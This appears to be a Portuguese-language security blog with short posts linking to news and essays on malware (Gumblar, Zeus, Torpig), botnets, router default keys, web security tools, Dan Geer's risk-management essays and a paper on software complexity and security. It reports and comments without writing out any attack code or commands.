virus em imagens

As imagens dos vírus informáticos
Fonte: TDSnews e InformationWeek

um conjunto de imagens 3D criadas com base no código e comportamento de um conjunto de virus

O MYDOOM:

mudar o ssid do router wireless

É necessário porque a partir dos SSIDs usados por alguns fabricantes é possível descobrir a chave WEP/WPA:

Default key algorithm in Thomson and BT Home Hub routers
fonte: gnucitizen

botnets vistas por dentro

Uma série de screenshots engraçados:

Inside the botnets that never make the news - a gallery
http://blogs.zdnet.com/security/?p=3432

"If you ever wanted to take an inside view of targeted-botnets primarily run by novice cybercriminals sometimes utilizing outdated, but very effective methods - this ZDNet photo gallery is for you."

Gumblar

"A malware exploit that has been circulating since March or so is picking up the pace lately, hijacking more than 3,000 websites as of this week. Gumblar's goal is to manipulate Google's results in order to affect as many PCs as possible, which has some researchers describing it as "a botnet of compromised websites."

"Security researchers are stepping up their warnings about the Gumblar malware exploit as it continues to hijack webpages and manipulate Google results. Gumblar recently got the attention of the United States Computer Emergency Readiness Team (US-CERT), which noted on its website that Gumblar is alive and well and continues to circulate by hijacking vulnerable Web applications, poor configuration settings, or simply by stealing FTP credentials.

Experts who have been tracking Gumblar since March say that the malware directly manipulates files on Web servers after getting access to them. From there, the attack changes the files to inject scripts and distribute more malicious code out of gumblar.cn or from other, varying IP addresses. The code appears to target sites that show up in Google searches, according to the ScanSafe STAT Blog, and although Google began delisting compromised websites months ago, the code keeps changing, keeping Google on its toes."

fonte: ArsTechica
http://arstechnica.com/security/news/2009/05/gumblar-exploit-hijacking-websites-and-picking-up-steam.ars

ciber-guerra: episódio 3?

Analyst: cyberwarfare arms race with China imminent

A security expert informed Congress last month that the United States is entering a cyberwarfare arms race with China. Some of his information, however, seems to be misleading, especially about China's "top secret" OS.

fonte: ArsTechnica

risk management

Risk Management is Where Money Is
Dan Geer, Nov. 1998

Given my biases, I am going to describe where the future of the security
marketplace is and where it is not. I will argue that the financial
community is and remains the place to look for "first light" for new
security technology. I will give you a rundown of what's new while I predict
what little time is left for many of today's products, purveyors and
regulators. I will argue that, in many ways, the party's over for the
security field as we know it now. I will range broadly because security, as
a concept, is universal. (...)

Risk Management Is Still Where the Money Is
Dan Geer, Computer, Dez. 2003

Five years ago, I gave a short speech at the Digital Commerce Society of Boston, titled “Risk Management Is Where the Money Is” (http://catless.ncl.ac.uk/Risks/20.06.html). In the speech, I proposed looking at security as a risk management proposition. Many things have changed since then, so perhaps it is time to reassess and to confirm in word what has been confirmed in deed. (...)

algumas ferramentas para segurança de aplicações web

GreenSQL
http://www.greensql.net/
GreenSQL is an Open Source database firewall used to protect databases from SQL injection attacks. GreenSQL works as a proxy and has built in support for MySQL. The logic is based on evaluation of SQL commands using a risk scoring matrix as well as blocking known db administrative commands (DROP, CREATE, etc).

w3af
http://w3af.sourceforge.net/
w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

(in)segurança no Twitter


um artigo interessante do Gary McGraw:

Software [In]Security: Twitter Security

"(...) But this is a security column, so lets spend a few minutes pondering the security ramifications of Twitter. I can think of a few right off the top of my head: it's easy to spoof someone on Twitter, it's a perfect vector for malicious code and phishing, Twitter allows dingbats to cash in their last remaining privacy chit, and it has a coolness factor that often overrides common sense."

Mestrados

Ainda estão abertas até ao fim de Maio as candidaturas ao Mestrado em Segurança Informática /Master in Information Technology - Information Security (MSIT-IS) com grau duplo Carnegie Mellon Univ. / Univ. de Lisboa. Informação em:
http://cmuportugal.di.fc.ul.pt/?MSc_in_Information_Security

Estão também abertas as candidaturas aos outros mestrados em informática da FCUL:
http://acesso.fc.ul.pt/

Codificação de output e ataques XSS

Um artigo interessante no blog Coding Insecurity:
http://coding-insecurity.blogspot.com/2009/05/getting-output-encoding-right.html

botnet desliga 100 mil PCs

Botnet master hits the kill switch, takes down 100,000 PCs

"Botnets aren't just dangerous because they can steal massive amounts of personal data and launch denial-of-service attacks—they can also self-destruct, leaving the owners of affected machines in the dust. The controllers of one such botnet recently hit the kill switch for one reason or another, taking down some 100,000 infected computers with it.

(...) But Zeus had another interesting feature—one that isn't terribly uncommon among botnet software, it turns out. A command was built into the software to kos—or "kill operating system"—and it was apparently executed some time last month.

The reason for BSODing 100,000 machines isn't quite clear, but several security experts have offered up their opinions. S21sec wrote on its blog that those behind Zeus might have wanted more time to exploit the financial data they had harvested by removing the user's ability to get online and see that money was being transferred. On the other hand, (...) "Maybe the botnet was hijacked by another crime group," Hüssy told the Post. Or, he postulated, perhaps those behind Zeus were just dumb. (...)"

Fonte: ArsTechnica

Segurança da informação: confiança

A questão da confiança (trust/trustworthiness) é muito mais difícil em relação aos dados do que ao serviço prestado. Um artigo muito interessante relacionado com isso (e infelizmente não apenas sobre os dados fornecidos por sistemas informáticos):

Wikipedia hoax points to limits of journalists' research

A sociology student placed a fake quote on Wikipedia, only to see it show up in prominent newspapers, revealing that a lot of the press doesn't go much further than most 'Net users when it comes to researching a story.

Excerto:

"Fitzgerald was apparently curious how far his hoax would spread, and expected it to appear on a variety of blogs and similar sites. Instead, to his surprise, a search picked it up in articles that appeared at a variety of newspapers. Fitzgerald eventually removed his own fabricated quote and notified a variety of news outlets that they had been tricked, but not all of them have apparently seen fit to publish corrections or to ensure that their original stories were accurate, even though fixing a webpage shouldn't be a challenging thing.

Fonte: ArsTechnica

Complexidade do software é razão para a falta de segurança?

um artigo que discute essa ideia:

Shin, Y. and Williams, L., Is Complexity Really the Enemy of Software Security?, Quality of Protection Workshop at the ACM Conference on Computers and Communications Security (CCS) 2008, Alexandria, VA, pp. 47-50.

Software complexity is often hypothesized to be the enemy of
software security. We performed statistical analysis on nine
code complexity metrics from the JavaScript Engine in the
Mozilla application framework to investigate if this hypothesis
is true. Our initial results show that the nine complexity
measures have weak correlation (ρ=0.30 at best) with security
problems for Mozilla JavaScript Engine. The study should be
replicated on more products with design and code-level metrics.
It may be necessary to create new complexity metrics to
embody the type of complexity that leads to security problems.

A história de uma hacker

em banda desenhada... divertido. São vários episódios, é preciso ir carregando em "next":

hacking a botnet for fun and profit

Researchers hijack botnet, score 56,000 passwords in an hour

The Torpig botnet was hijacked by the good guys for ten days earlier this year before its controllers issued an update and took the botnet back. During that time, however, researchers were able to gain a glimpse into the kind of information the botnet gathers as well as the behavior of Internet users who are prone to malware infections.

Artigo completo
Fonte: http://arstechnica.com

vulnerabilidades importantes em 5 aplicações web

Five 'must-secure' Web app vulnerabilities
by Ryan Naraine, ZeroDay

na realidade não são 5 mas vulnerabilidades em 5 web apps:
1. Apache Geronimo Application Server
2. SAP cFolders
3. CS Whois Lookup
4. phpMyAdmin
5. Novell Teaming